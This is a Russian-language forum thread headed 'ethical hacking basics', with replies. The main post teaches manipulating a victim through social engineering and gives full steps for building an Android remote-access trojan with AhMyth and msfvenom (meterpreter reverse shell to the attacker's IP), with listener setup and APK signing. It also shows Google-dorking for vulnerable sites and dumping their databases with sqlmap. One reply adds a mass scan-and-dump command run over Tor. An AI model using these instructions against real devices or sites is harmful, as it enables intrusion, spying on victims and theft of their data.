Этичный Хакинг | Основы

T

to_0day

1569861289443.png


Приветствую дорогие друзья. Данная статья написана для тех, кто начинает свой путь в информационную безопасность. Будем говорить о основных знаниях и умениях, которые нужно знать каждому. По крайней мере с этого начинал я. И хочется как говорится поделиться опытом и предотвратить развития своих ошибок у других людей. Кого я заинтересовал, приступим.

Введение

А начну пожалуй с того, на сколько актуальна данная тема. На данный момент ни одна система не является безопасной. На каждую из них найдется свой умник, а даже не один, который сможет обойти всю систему безопасности на определенном сервере или сайте. Не важно. На данный момент именно умения разбираться в ИБ очень важно, так как людей на такую должность идет довольно мало. И так, моя же задача научить вас основам и погрузить в этот путь. Дать заряда уверенности и мотивации, чтобы вы продолжили свой путь. Но пожалуй тут будет по мимо этого всего и доля практики, после которой вы сможете спокойно взламывать ПК и сайты со "стандартной" защитой. Переходим к основам.

Теория | Просто и легко

1569861347699.png


И так, как мы все знаем, прежде чем ломать какой-либо сайт хакер первым делом собирает информацию о нем. Да это не только о сайтах. Даже при заражении чужого пк нужно знать жертву. Для этого есть отдельный термин. Социальная Инженерия. Сокращенно СИ, но давайте рассмотрим, что это такое:

Социальная Инженерия - это прежде всего приемы, методы и технологии в целом, которые создают нужную обстановку вокруг жертвы (условия, обстоятельства) которые приводят хакера к определенному результату. То есть он манипулирует жертвой. Давайте рассмотрим самый простой пример.

Представьте себе очередного человека, который ничем не отличается от других. Он так же развлекается, ходит в кино, музеи и другие места. Типичная жизнь, но на что нам обратить внимания и что даст нужную информацию, которая позволит завоевать доверия человека? Прежде всего нужно смотреть на характер. При встречах уделять внимания движениям. К примеру это может дать знак на невнимательность человека. Давайте я вам расскажу пару секретов, которые помогут при общении с людьми:

"Не спеши улыбаться" - не улыбайтесь при встрече с жертвой. В таком случае начинает казаться, что это адресовано всем окружающим. В таком случае мгновенно всматривайтесь в лицо человека. И только после парочки секунд можете улыбнуться. Это даст понять, что данное действие адресовано именно собеседнику и может дать толчёк на хороший разговор.

"Неутомимый взгляд" - данный прием заключается в том, что при общении ваша задача не отрывать глаза от собеседника, даже если он прекратил разговор. Это дает уверенность в себе и то, что вы полностью доверяете человеку. В случае того, если вам нужно отвести взгляд рекомендуется делать это медленно пытаясь удержать взгляд на человеке.

"Больше информации" - представьте, что вам нужно в ходе разговора по определенной теме узнать от жертвы все по максимум. Как это сделать? Все очень просто. Покажите свое безразличие к собеседнику. При общении с ним, он увидит, то на сколько данная тема не интересна вам и попытается дать как можно больше информации по ней. Работает не со всеми, но попробовать стоит.

"Старый друг" - это очень важная часть, при которой складывается ситуация первого общения с жертвой. Многие начинают волноваться и паниковать. А вы пробовали представить, что это ваш старый друг? Нет, ну тогда скорее тестируйте. В таком случае ваш мозг подсознательно переключит вас на позитивный лад. Да и тело примет нужную позицию для дружеского разговора.

"Концентрация" - у всех наверно во время важного разговора начинают стучать по столу пальцы. Ноги начинают двигаться, как и само тело. Попробуйте это убрать. Не беспокойтесь и не подавайте подобных знаков. Это даст доверие у собеседника к вам. А это важное и то, чего добиваются многие.

И так. Это только небольшая часть и приемы на лицо. Как дополнительный контент, хочу оставить вам свою книгу. Там вы сможете более подробнее изучить данную тему. Скачиваем здесь. Ну а мы идем дальше. Ну а если точнее, то к созданию первого вируса.


Теория | Крысы повсюду!

1569861405720.png


Вот и плавно мы переходим ко второму разделу моей статьи. Давайте представим, что к вам плывет в голову при слове RAT? В переводе с английского это крыса, но.... не все так просто. Это аббревиатура под которой у нас скрывается не очень хорошее название:

RAT (Remote Access Trojan) - вирус троян для удаленного доступа к чужому устройству. Наиболее опасный вирус шпион для слежки за пользователями. Создается очень легко и просто, чем мы сейчас и займемся.

А для создания мы будем использовать две программы. Создадим на Linux и Windows. Буду писать как можно подробнее, но оставляя только нужную информацию. Приступим к созданию.


Практика | Сливаемся с местностью

Ну что же, перейдем непосредственно к созданию. Начну пожалуй с Windows. Создавать оба класса троянов будем под Android, но я так же оставлю ресурсы для создания таких вирусов под ПК. Идем к самому процессу.

В одной из своих статей я подробно описывал действия данной программы. А именно я говорю про AhMyth RAT. Давайте, чтобы далеко не ходить попробуем создать все через него. А, да, кому интересно где первоначально этот софт я упомянул читаем здесь. Ну а мы переходим к настройке и установки:

1. Для начало посетим Github.
2. Там выбираете свой тип загрузки (Win64 and Win32).
3. После распаковываем нашу программу.
4. В первом окошке VCTIMS LAB кликаем на кнопку >_ Listen.
5. Переходим на соседнее окно и в Source IP вводим наш IP адресант.
6. Узнать IP можно нажав Win + R и введя в окно cmd, а после ipconfig.
7. Теперь соберем нашего шпиона. Кликаем на кнопку Build.
8. Ждем результата и после вытаскиваем вирус из указанного пути.

Вот такая легкая схема создания небольшого RAT'ника для удаленного управления. После того как ваш вирус запустится на устройстве вы увидите открытую сессию, в которой сможете контролировать устройство жертвы. Теперь же перейдем к более легкому пути и создадим этот же вирус но на Linux с дистрибутивом Kali и через софт msfvenom. Приступим.


Практика | Linux твой друг!

Как было сказано ранее мы будем писать тот же троян удаленного действия, но уже на Kali Linux. Сразу скажу, это гораздо проще и менее затратнее по времени. Перейдем к делу.

1. Открываем терминал.
2. Пишем данный код:
msfvenom -p android/meterpreter/reverse_tcp LHOST=здесь ваш IP LPORT=4444 R > FileName.apk
3. Теперь у нас создается вирус и в ответ мы получаем это:
No platform was selected, choosing Msf::Module::platform::Android from the payload

No Arch selected, selecting Arch: dalvik from the payload
No encoder or badchars specified, outputting raw payload

Payload size: 9485 bytes
4. Это означает, что все отлично и наш вирус создан, но это только пол дела.
5. Вводим в том же терминале msfconsole.
6. Так же теперь прописываем:
use exploit/multi/handler
7. И дальше вводим последовательно данный код:
set LHOST ваш IP
set LPORT 4444
8. Чтобы узнать ip адрес пишите ifconfig.
9. После запуска на устройстве жертвы у вас откроется сессия meterpreter с расширенным функционалом для управления.

Вроде все понятно разъяснил. В дополнении я дам вам парочку функций для каких-либо улучшений готового apk.

Создание хранилища ключей -
keytool -genkey -v -keystore my-release-key.Keystore -alias app -keyalg RSA -keysize 2048 -validity 10000

Подписание созданного apk -
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.Keystore путь к вирусу.apk

Проверка вируса -
jarsigner -verify -verbose -certs путь к вирусу.apk

И так, теперь мы от и до разобрались с тем, как создать свой вирус. Но я вам обещал дать другие программы для создания вирусов под ПК. А вот их список:

1. DarkComet Rat
2. Spy-Net
3. ProRAT
4. Back Orifice
5. Cerberus Rat

Вот и список, да он небольшой, но ради ознакомления советую посмотреть данный софт. Ну а мы двигаем дальше.


Теория | Инъекция Сайта

1569861451594.png


И так, давайте перейдем к сайтам и посмотрим самый как по мне легкий способ взломать сайт.

SQL инъекция - вид атаки при котором на сайт внедряется в запрос произвольный SQL код. Для выявления данной атаки чаще всего в конце URL ставят ' если перед ним указано id=число.

Запомнить легко, но давайте попробуем найти такую уязвимость. Для этого воспользуемся Google Dorks. Открываем гугл и вводим:

inurl:index.php?id=

И ищем любой незащищенный сайт. Да, хочу сказать очень важную деталь. Многие наверно замечали, что при выявлении данной уязвимости в конец ссылки часто сайт ставит вместо ' берет %27. Это ничем не отличается. Так как %27 это та же одиночная верхняя запятая. Но давайте на практике попробуем воспользоваться данной уязвимостью и взломать сайт.


Практика | SQL Карта

1569861514300.png


Работать так и продолжим на Kali Linux. Советую новичкам привыкать к линукс так как на нем в большей степени работают хакеры. Как бы это глупо не прозвучало. Но для проведения аудита на безопасность стоит воспользоваться Linux. Для этого используем софт sqlmap:

1. Открываем терминал.
2. Пишем данный код:

sqlmap -u http://*****/index.php?id=1_s

3. Данный сайт я использовал как пример. Можете взять любой другой, но я опишу процесс на нем.
4. Получаем список базы данных:

sqlmap -u http://*****/index.php?id=1_s --dbs

5. После обнаружения БД нам нужно в них перейти командой:

sqlmap -u http://*****/index.php?id=1_s -D выбранная вами база данных --tables

6. Теперь перед нами открылась таблица и допустим нам нужно узнать, что в них храниться, а именно колонки. Для этого пишем:

sqlmap -u http://*****/index.php?id=1_s -D выбранная вами база данных -T выбранная вами таблица --columns

7. Но, по всей видимости это не то, что мы ищем. Поэтому, чтобы узнать содержимое в этой таблице мы пишем:

sqlmap -u http://*****/index.php?id=1_s -D выбранная вами база данных -T выбранная вами таблица --dump

Вот вам и основное использование данной уязвимости. По виду сказать что сложно нельзя, но все же теории без практики никогда не бывает. Это только часть информации, которую я вам предоставил. Продолжения будет, но для этого мне нужно знать ваше мнения. А пока идем к выводам.


Вывод | Итог

Данная статья дает маленькую часть знаний в сфере хакинга. Лично скажу с этого начинал я. Это не сложно, пока не столкнешься с настоящей проблемой. Но их нужно преодолевать. Хочу сказать, что данная информация даст по мимо практики и теории небольшую мотивацию к подробному изучению данной темы. Здесь вы узнали только небольшой фрагмент и он даст вам шаг двигаться дальше. Ну а на этом у меня все. Удачи и не попадитесь ;)
 
Последнее редактирование модератором:
T

to_0day

Очередная лоу левел тема. Обо всем и ни о чем. Давайте лучше подумаем, более интересные вещи?
Интересно, а вот вместо своего негатива вы можете указать на ошибки, а не просто так высказывать очередное никому не нужное мнение? Просто мне кажется это будет куда полезнее чем это во всяком случае.
 

drkkzr

Green Team
16.02.2017
29
20
BIT
11
Интересно, а вот вместо своего негатива вы можете указать на ошибки, а не просто так высказывать очередное никому не нужное мнение? Просто мне кажется это будет куда полезнее чем это во всяком случае.
Наверно можно было бы разделить разделы(про RAT, Injection и тд) на отдельные темы более развернутые и интересные.А не писать все в одной статье как сказали выше "Обо всем и ни о чем".
 
  • Нравится
Реакции: to_0day
T

to_0day

Наверно можно было бы разделить разделы(про RAT, Injection и тд) на отдельные темы более развернутые и интересные.А не писать все в одной статье как сказали выше "Обо всем и ни о чем".
Хорошо, спасибо за ответ. Постараюсь следовать вашим советам.
 

SooLFaa

Platinum
15.07.2016
898
1 560
BIT
36
Создать раздел "Для новичков" или в подобном роде ?
Надо крепенько подумать, как лучше поступить. Опять же если подумать с точки зрения Бизнеса. Зачем по идее форуму статьи "От новичков"?! Лучше не от новичков а песочница.
 

N4G4

One Level
29.09.2019
4
6
BIT
0
Ничего нового конечно, но хотелось бы добавить про СИ, Я не думаю что стоит общаться с жертвой в живую и смотреть на какие то там реакции, это бред, всё прекрасно манипулируется и удаленно, главное создать услугу, и обстоятельства при которых наша услуга станет необходимой, первое впечаление, давление на потребности и инстинкты, множество научных экспериментов из которых можно было привести хороший пример способов манипуляции для статьи. Ну да ладно. Поддерживаю тему с песочницей.
 

sever0ever

Green Team
23.05.2019
18
14
BIT
0
Интересно, а вот вместо своего негатива вы можете указать на ошибки, а не просто так высказывать очередное никому не нужное мнение? Просто мне кажется это будет куда полезнее чем это во всяком случае.
Дело не в ошибках, а в том, что предоставленная информация не дает реальных, работающих на сегодняшний день, инструментов даже для новичков:
1)По зловредам: ратники это конечно хорошо, а ты показал как их криптовать, чтобы они работали в полевых условиях и не палились всем чем можно, показал как настраивать их для работы? Вот пример отличной статьи для новичков по этой теме Meterpreter снова в деле: 100% FUD with Metasploit 5 автор разжевал все что возможно как создавать полезную нагрузку, как ее прятать итд.
2)По sql никакой информации о тамперах, об интеграции, о переменных. Вот как новички сейчас используют sqlmap: atscan --dork productlist.php?tid= --level=1,2,3,4,5,6,7,8,9,10 -m google,bing,ask --sql --save /root/atscan1.txt --proxy socks://localhost:9150 --command "sqlmap -m /root/atscan1.txt --batch --level=1 --risk=1 --random-agent --threads=3 --count --tamper randomcase.py --search -T admin,acc,permission,pass,pwd,login,user,usr,auth,logon,dev --dump-format=CSV --answers=quit=n,crack=n --output-dir=dumps --exclude-sysdbs --timeout=120 --time-sec=15 --retries=5 --tor --tor-type socks5 --tor-port=9150 --check-tor" (в запросе специально допущена небольшая ошибка - антинуб)
3)Про СИ вообще ничего говорить не буду, это не та тема, чтобы затрагивать ее вскольз.
Информация, которую ты даешь она не для новичков, она устарела и вводит в заблуждение. Это тебе как раз мнение новичка для которого ты писал эту статью - статья мне не помогла. Лучше возьми какую-то одну тему или инструмент и сделай по нему хороший гайд от и до, чтобы даже обезьяна могла по твоей инструкции сделать также - это и будет для новичков.
 

id2746

Green Team
12.11.2016
435
644
BIT
21
Но пожалуй тут будет по мимо этого всего и доля практики, после которой вы сможете спокойно взламывать ПК и сайты со "стандартной" защитой
ну вы поняли..
ИМХО, изложение даже до скрипт-кидди не канает
Веедите то введите это и вот появляется кролег из шапки...

7. Но, по всей видимости это не то, что мы ищем. Поэтому, чтобы узнать содержимое в этой таблице мы пишем:

sqlmap -u http://*****/index.php?id=1_s -D выбранная вами база данных -T выбранная вами таблица --dump
Ну например я вытащил таблицу с юзер\пасс админа. Где использовать эти данные?
Почему вообще получилось вытащить эти данные?

5. Вводим в том же терминале msfconsole.
6. Так же теперь прописываем:
use exploit/multi/handler
7. И дальше вводим последовательно данный код:
set LHOST ваш IP
set LPORT 4444
8. Чтобы узнать ip адрес пишите ifconfig.
9. После запуска на устройстве жертвы у вас откроется сессия meterpreter с расширенным функционалом для управления.
После запуска атакуемым пейлоуда у вас НЕ откроется сессия. Угадайте почему.
 
Последнее редактирование:

HebiNeco

Green Team
31.08.2019
124
35
BIT
0
RAT - Remote Admin Tools, разве нет? Изначально создавались админами для быстрого доступа к удаленным серверам
 

nikromikon

Green Team
27.08.2019
44
2
BIT
0
Основы основ, дополнил бы тем что надо быть внимательнее и сообразительнее)
+ Поломать сайт возможно только браузером без модификаций.
+ Пройти можно в любую систему, нельзя пройти в систему которой не существует.
+ English + Google
+Linux + man.
Статья для новичков самое то!
 
  • Нравится
Реакции: Smaiyler
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!